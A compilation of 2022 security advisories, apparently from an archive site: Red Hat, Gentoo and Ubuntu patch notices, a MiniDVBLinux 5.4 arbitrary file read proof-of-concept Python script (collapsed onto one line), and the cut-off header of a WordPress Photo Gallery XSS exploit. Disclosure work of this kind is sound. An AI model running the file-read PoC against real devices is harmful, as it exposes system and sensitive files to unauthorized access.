Red Hat Security Advisory 2022-6967-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: compat-expat1 security update  
Advisory ID:       RHSA-2022:6967-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6967  
Issue date:        2022-10-17  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for compat-expat1 is now available for Red Hat Enterprise Linux 6  
Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 6 ELS) - i386, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux Server (v. 6 ELS):

Source:  
compat-expat1-1.95.8-9.el6_10.src.rpm

i386:  
compat-expat1-1.95.8-9.el6_10.i686.rpm  
compat-expat1-debuginfo-1.95.8-9.el6_10.i686.rpm

s390x:  
compat-expat1-1.95.8-9.el6_10.s390.rpm  
compat-expat1-1.95.8-9.el6_10.s390x.rpm  
compat-expat1-debuginfo-1.95.8-9.el6_10.s390.rpm  
compat-expat1-debuginfo-1.95.8-9.el6_10.s390x.rpm

x86_64:  
compat-expat1-1.95.8-9.el6_10.i686.rpm  
compat-expat1-1.95.8-9.el6_10.x86_64.rpm  
compat-expat1-debuginfo-1.95.8-9.el6_10.i686.rpm  
compat-expat1-debuginfo-1.95.8-9.el6_10.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY01tGdzjgjWX9erEAQj4BA/+Pj+tNylhHbtsXCUw5OjH8R9mVt0pPUNa  
ITwQFgwJEdijGdRirjC4SjOHArzM6t+vNRPMZu4KWW2TGwmfkKcBf+grhxbm36E6  
TS7y7S2eKpwXcD2O9YtGZJO993/vkhWJrx5GILgDsBjK/FpKNM7JdaCcnu5Tiusb  
jYP7R7horqMYwst5C3K4W+7toTE05JTR/whPvoke+Q6dVx+ZKm5KQV7a1Xo/jPrL  
tQuhxrRZIAFCYidNPuP0eDxpFvvb+KDCCuTcHYqRgzElbS2YsXXnT9VGFRRjfKjW  
7vw6PMuSR5flOunzOxOE+FnXnqbD9cO9yCIl3dGGyFUsgTlztOfcuw4b9aBCNE5E  
2rZkSTcu52VzwKGyN4wPBdEw3utxK+7uTJFn9KOfAy1xef6MYa9+lSWtQiBS7m2E  
0au5mNbi61+cjgD2fV49CaQzKa1WBmVu/pyH7Is6upNU1Ojhz4ag4Kfs+BXC3dw4  
Hm9CwElknXh10mR+5lycEoxI9Xm19x7GefBLvdJf8tFrAr79eScX1g2sXDnaV/hM  
j6lPJnz6U+nD3c8AJsgLhdRStUnwYd8AtAdqJlkI1JTrEqI9/1lHHda3IH8p3EDj  
Ah/fBeiNwD20jtJulVItDIvvVkroE6hcNNiclcP6SFn7+T4gP/juPL8i58nwJemy  
DhgIuY5pxkU=zNn/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6967-01

Red Hat Security Advisory 2022-6969-01 - An update for tripleo-ansible is now available for Red Hat OpenStack Platform. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (tripleo-ansible) security update  
Advisory ID:       RHSA-2022:6969-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6969  
Issue date:        2022-10-17  
CVE Names:         CVE-2022-3101 CVE-2022-3146  
====================================================================  
1. Summary:

An update for tripleo-ansible is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch

3. Description:

TripleO Ansible project repository. Contains playbooks for use with TripleO  
OpenStack deployments. https://opendev.org

Security Fix(es):

* /var/lib/mistral/overcloud discoverable (CVE-2022-3101)

* /etc/openstack/clouds.yaml discoverable (CVE-2022-3146)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2120660 - CVE-2022-3101 tripleo-ansible: File permissions are too liberal on a director deployment [openstack-16.2]  
2123767 - CVE-2022-3146 tripleo-ansible: /etc/openstack/clouds.yaml got 644 permission [openstack-16.2]  
2123870 - CVE-2022-3101 tripleo-ansible: /var/lib/mistral/overcloud discoverable  
2124721 - CVE-2022-3146 tripleo-ansible: /etc/openstack/clouds.yaml discoverable  
2124732 - CVE-2022-3146 tripleo-ansible: /etc/openstack/clouds.yaml got 644 permission [openstack-16.1]  
2130109 - ceph inventory linking fails with permission issues  
2130598 - ceph inventory linking fails with permission issues

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
openstack-tripleo-common-11.4.1-1.20211201113404.el8ost.src.rpm  
openstack-tripleo-heat-templates-11.3.2-1.20220114223346.el8ost.src.rpm  
tripleo-ansible-0.5.1-1.20220114163454.el8ost.src.rpm

noarch:  
openstack-tripleo-common-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-common-container-base-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-common-containers-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-common-devtools-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-heat-templates-11.3.2-1.20220114223346.el8ost.noarch.rpm  
python3-tripleo-common-11.4.1-1.20211201113404.el8ost.noarch.rpm  
tripleo-ansible-0.5.1-1.20220114163454.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-tripleo-common-11.7.1-2.20220318011206.el8ost.src.rpm  
openstack-tripleo-heat-templates-11.6.1-2.20220409014870.el8ost.src.rpm  
tripleo-ansible-0.8.1-2.20220406160116.el8ost.src.rpm

noarch:  
openstack-tripleo-common-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-common-container-base-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-common-containers-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-common-devtools-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-heat-templates-11.6.1-2.20220409014870.el8ost.noarch.rpm  
python3-tripleo-common-11.7.1-2.20220318011206.el8ost.noarch.rpm  
tripleo-ansible-0.8.1-2.20220406160116.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3101  
https://access.redhat.com/security/cve/CVE-2022-3146  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY01tTtzjgjWX9erEAQietQ/9F9yZlY9G04oLYTUz/82AcyNJdjKGEqgM  
5APs6Pu1Dy65KoV77pBUIYgDfzqX61JLPf7w6A/RuShRTUr2GVoj9Mf7r7n+xBjH  
FwrCWygRzNSh68ZAYouLtIQgRbm0uP097ySyQpe/TQY6X6tlH+fUVFiAy8UgvuoW  
WZ1W9cVBsJVVP6gD145TMZtlkRC9xQ7vajVOJH3l9TrwLqw/CSrfJLCXqA5C9z7G  
6AJ66TZGNEaMMQ/sWDBJja4y8jkIxbR2K75Cq36rsxifUWLSgZOEa90eejptxz5F  
l13HKFThfwJmgZ+KwppFLvMhI4lrtAdwcgBOgK3iGJ25exFm4ZCXG7V8x8QbxeNn  
KNa8Dz+MwdxzJkg946jIiLUqgNgKXn4rXXFfCFBYfks+jU8kKAcW8Jqld/Z7rcZ3  
SIB5/sqKQnYjYpwf3Wm61Giy6l0jU/qqidIaVXf65klYZq8+HeA2wcFvGnDsMbWm  
sd4GctIb0LEsDfVYp2OocIsbmywFqxEI5if/Zva02Rao/AZaB1KieviAlripNeeE  
2S+P3E2NNFlbqJvMMhtkNomHZaGiGhz2UzdMHjEdeKR3U1L1EylQcyDqqMQHRF/F  
DW51qj28YUn6WBJFG7YO/zdMvepS3HU8S/x/4x2j90ooh+2pFrFNJMABR9Tdz5Yb  
YYZ6btlYW78=bZIq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6969-01

Red Hat Security Advisory 2022-6964-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a HTTP request smuggling vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: nodejs:16 security update  
Advisory ID:       RHSA-2022:6964-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6964  
Issue date:        2022-10-17  
CVE Names:         CVE-2022-35255 CVE-2022-35256  
====================================================================  
1. Summary:

An update for the nodejs:16 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The following packages have been upgraded to a later upstream version:  
nodejs 16.

Security Fix(es):

* nodejs: weak randomness in WebCrypto keygen (CVE-2022-35255)

* nodejs: HTTP Request Smuggling due to incorrect parsing of header fields  
(CVE-2022-35256)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2130517 - CVE-2022-35255 nodejs: weak randomness in WebCrypto keygen  
2130518 - CVE-2022-35256 nodejs: HTTP Request Smuggling due to incorrect parsing of header fields

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-16.17.1-1.module+el8.6.0+16848+a483195a.src.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16240+7ca51420.src.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.src.rpm

aarch64:  
nodejs-16.17.1-1.module+el8.6.0+16848+a483195a.aarch64.rpm  
nodejs-debuginfo-16.17.1-1.module+el8.6.0+16848+a483195a.aarch64.rpm  
nodejs-debugsource-16.17.1-1.module+el8.6.0+16848+a483195a.aarch64.rpm  
nodejs-devel-16.17.1-1.module+el8.6.0+16848+a483195a.aarch64.rpm  
nodejs-full-i18n-16.17.1-1.module+el8.6.0+16848+a483195a.aarch64.rpm  
npm-8.15.0-1.16.17.1.1.module+el8.6.0+16848+a483195a.aarch64.rpm

noarch:  
nodejs-docs-16.17.1-1.module+el8.6.0+16848+a483195a.noarch.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16240+7ca51420.noarch.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.noarch.rpm

ppc64le:  
nodejs-16.17.1-1.module+el8.6.0+16848+a483195a.ppc64le.rpm  
nodejs-debuginfo-16.17.1-1.module+el8.6.0+16848+a483195a.ppc64le.rpm  
nodejs-debugsource-16.17.1-1.module+el8.6.0+16848+a483195a.ppc64le.rpm  
nodejs-devel-16.17.1-1.module+el8.6.0+16848+a483195a.ppc64le.rpm  
nodejs-full-i18n-16.17.1-1.module+el8.6.0+16848+a483195a.ppc64le.rpm  
npm-8.15.0-1.16.17.1.1.module+el8.6.0+16848+a483195a.ppc64le.rpm

s390x:  
nodejs-16.17.1-1.module+el8.6.0+16848+a483195a.s390x.rpm  
nodejs-debuginfo-16.17.1-1.module+el8.6.0+16848+a483195a.s390x.rpm  
nodejs-debugsource-16.17.1-1.module+el8.6.0+16848+a483195a.s390x.rpm  
nodejs-devel-16.17.1-1.module+el8.6.0+16848+a483195a.s390x.rpm  
nodejs-full-i18n-16.17.1-1.module+el8.6.0+16848+a483195a.s390x.rpm  
npm-8.15.0-1.16.17.1.1.module+el8.6.0+16848+a483195a.s390x.rpm

x86_64:  
nodejs-16.17.1-1.module+el8.6.0+16848+a483195a.x86_64.rpm  
nodejs-debuginfo-16.17.1-1.module+el8.6.0+16848+a483195a.x86_64.rpm  
nodejs-debugsource-16.17.1-1.module+el8.6.0+16848+a483195a.x86_64.rpm  
nodejs-devel-16.17.1-1.module+el8.6.0+16848+a483195a.x86_64.rpm  
nodejs-full-i18n-16.17.1-1.module+el8.6.0+16848+a483195a.x86_64.rpm  
npm-8.15.0-1.16.17.1.1.module+el8.6.0+16848+a483195a.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-35255  
https://access.redhat.com/security/cve/CVE-2022-35256  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY01tM9zjgjWX9erEAQgRRw/8DdK1QObq3so9+4ybaPFjCpdytAyNFy2E  
vrWNb7xRSO8myrQJ3cspxWMgRgfjMeJYPL8MT7iolW0SMWPd3uNMIh6ej3nK6zo+  
BqHGgPBB2+knIF9ApMxW+2OpQAl4j0ICOeyLinqUXsyzDqPUOdW5kgNIPog668tc  
VsxB2Lt7pAJcpNkmwx6gvU5aZ6rWOUeNKyjAnat5AJPUx+NbtOtFWymivlPKCNWg  
bcGktfXz22tAixuEih9pC+YrPbJ++AHg5lZbK35uHBeGe7i9OdhbH8lbGrV5+0Vo  
3DOlVTvuofjPZr0Ft50ChMsgsc/3pmBTXZOEfLrNHIMlJ2sHsP/3ZQ4hUmYYI3xs  
BF6HmgS4d3rEybSyXjqkQHKvSEi8KxBcs0y8RrvZeEUOfwTPwdaWKIhlzzn3lGYm  
a4iPlYzfCTfV4h2YdLvNE0hcOeaChiPVWvVxb9aV9XUW2ibWyHPSlJpBoP1UjMW4  
8T0tYn6hUUWhWWT4cra5ipEjCmU9YfhdFsjoqKS/KFNA7kD94NSqWcbPs+3XnKbT  
l2IjXb8aBpn2Yykq1u4t12VEJCnKeTEUt43/LAlXW1mkNV3OQ2bPl2qwdEPTQxDP  
WBoK9aPtqD6W3VyuNza3VItmZKYw7nHtZL40YpvbdA6XtmlHZF6bFEiLdSwNduaV  
jippDtM0Pgw=vFcS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6964-01

Gentoo Linux Security Advisory 202210-9 - Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service. Versions less than 1.63.0-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Rust: Multiple Vulnerabilities  
     Date: October 16, 2022  
     Bugs: #870166, #831638, #821157, #807052, #782367  
       ID: 202210-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Rust, the worst of  
which could result in denial of service.

Background  
=========  
A systems programming language that runs blazingly fast, prevents  
segfaults, and guarantees thread safety.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-lang/rust              < 1.63.0-r1              >= 1.63.0-r1  
  2  dev-lang/rust-bin          < 1.64.0                    >= 1.64.0

Description  
==========  
Multiple vulnerabilities have been discovered in Rust. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Rust users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/rust-1.63.0-r1"

All Rust binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/rust-bin-1.64.0"

In addition, users using Portage 3.0.38 or later should ensure that  
packages with Rust binaries have no vulnerable code statically linked  
into their binaries by rebuilding the @rust-rebuild set:

  # emerge --ask --oneshot --verbose @rust-rebuild

References  
=========  
[ 1 ] CVE-2021-28875  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28875  
[ 2 ] CVE-2021-28876  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28876  
[ 3 ] CVE-2021-28877  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28877  
[ 4 ] CVE-2021-28878  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28878  
[ 5 ] CVE-2021-28879  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28879  
[ 6 ] CVE-2021-29922  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29922  
[ 7 ] CVE-2021-31162  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31162  
[ 8 ] CVE-2021-36317  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36317  
[ 9 ] CVE-2021-36318  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36318  
[ 10 ] CVE-2021-42574  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42574  
[ 11 ] CVE-2021-42694  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42694  
[ 12 ] CVE-2022-21658  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21658  
[ 13 ] CVE-2022-36113  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36113  
[ 14 ] CVE-2022-36114  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36114

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-09

Ubuntu Security Notice 5682-1 - It was discovered that the BPF verifier in the Linux kernel did not properly handle internal data structures. A local attacker could use this to expose sensitive information. It was discovered that an out-of-bounds write vulnerability existed in the Video for Linux 2 implementation in the Linux kernel. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5682-1  
October 14, 2022

linux-aws-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems

Details:

It was discovered that the BPF verifier in the Linux kernel did not  
properly handle internal data structures. A local attacker could use this  
to expose sensitive information (kernel memory). (CVE-2021-4159)

It was discovered that an out-of-bounds write vulnerability existed in the  
Video for Linux 2 (V4L2) implementation in the Linux kernel. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-20369)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Pawan Kumar Gupta, Alyssa Milburn, Amit Peled, Shani Rehana, Nir Shildan  
and Ariel Sabba discovered that some Intel processors with Enhanced  
Indirect Branch Restricted Speculation (eIBRS) did not properly handle RET  
instructions after a VM exits. A local attacker could potentially use this  
to expose sensitive information. (CVE-2022-26373)

Eric Biggers discovered that a use-after-free vulnerability existed in the  
io_uring subsystem in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-3176)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1086-aws      5.4.0-1086.93~18.04.1  
   linux-image-aws                 5.4.0.1086.66

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5682-1  
   CVE-2021-4159, CVE-2022-20369, CVE-2022-2318, CVE-2022-26365,  
   CVE-2022-26373, CVE-2022-3176, CVE-2022-33740, CVE-2022-33741,  
   CVE-2022-33742, CVE-2022-33744, CVE-2022-36879

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1086.93~18.04.1

Ubuntu Security Notice USN-5682-1

MiniDVBLinux versions 5.4 and below suffer from an arbitrary file disclosure vulnerability.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Arbitrary File Read Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The distribution suffers from an arbitrary file disclosure# vulnerability. Using the 'file' GET parameter attackers can disclose# arbitrary files on the affected device and disclose sensitive and system# information.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5719# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUTif len(sys.argv) < 3:  print('MiniDVBLinux 5.4 File Disclosure PoC')  print('Usage: ./mldhd_fd.py [url] [file]')  sys.exit(17)else:    url = sys.argv[1]    fil = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file='+fil)outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))

MiniDVBLinux 5.4 Arbitrary File Read

Gentoo Linux Security Advisory 202210-8 - Multiple vulnerabilities have been discovered in Tcpreplay, the worst of which could result in denial of service. Versions less than 4.4.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Tcpreplay: Multiple Vulnerabilities  
     Date: October 16, 2022  
     Bugs: #833139, #836240  
       ID: 202210-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Tcpreplay, the worst of  
which could result in denial of service.

Background  
==========

Tcpreplay is a suite of utilities for UNIX systems for editing and  
replaying network traffic which was previously captured by tools like  
tcpdump and ethereal/wireshark.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-analyzer/tcpreplay     < 4.4.2                      >= 4.4.2

Description  
===========

Multiple vulnerabilities have been discovered in Tcpreplay. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tcpreplay users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/tcpreplay-4.4.2"

References  
==========

[ 1 ] CVE-2021-45386  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45386  
[ 2 ] CVE-2021-45387  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45387  
[ 3 ] CVE-2022-27416  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27416  
[ 4 ] CVE-2022-27418  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27418  
[ 5 ] CVE-2022-27939  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27939  
[ 6 ] CVE-2022-27940  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27940  
[ 7 ] CVE-2022-27941  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27941  
[ 8 ] CVE-2022-27942  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27942  
[ 9 ] CVE-2022-28487  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28487  
[ 10 ] CVE-2022-37047  
      https://nvd.nist.gov/vuln/detail/CVE-2022-37047  
[ 11 ] CVE-2022-37048  
      https://nvd.nist.gov/vuln/detail/CVE-2022-37048  
[ 12 ] CVE-2022-37049  
      https://nvd.nist.gov/vuln/detail/CVE-2022-37049

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-08

WordPress Photo Gallery plugin version 1.8.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/                                                     ││  Vendor   : Photo Gallery Team - wpsofts.com                                           ││  Software : WordPress Photo Gallery 1.8.0                                              ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        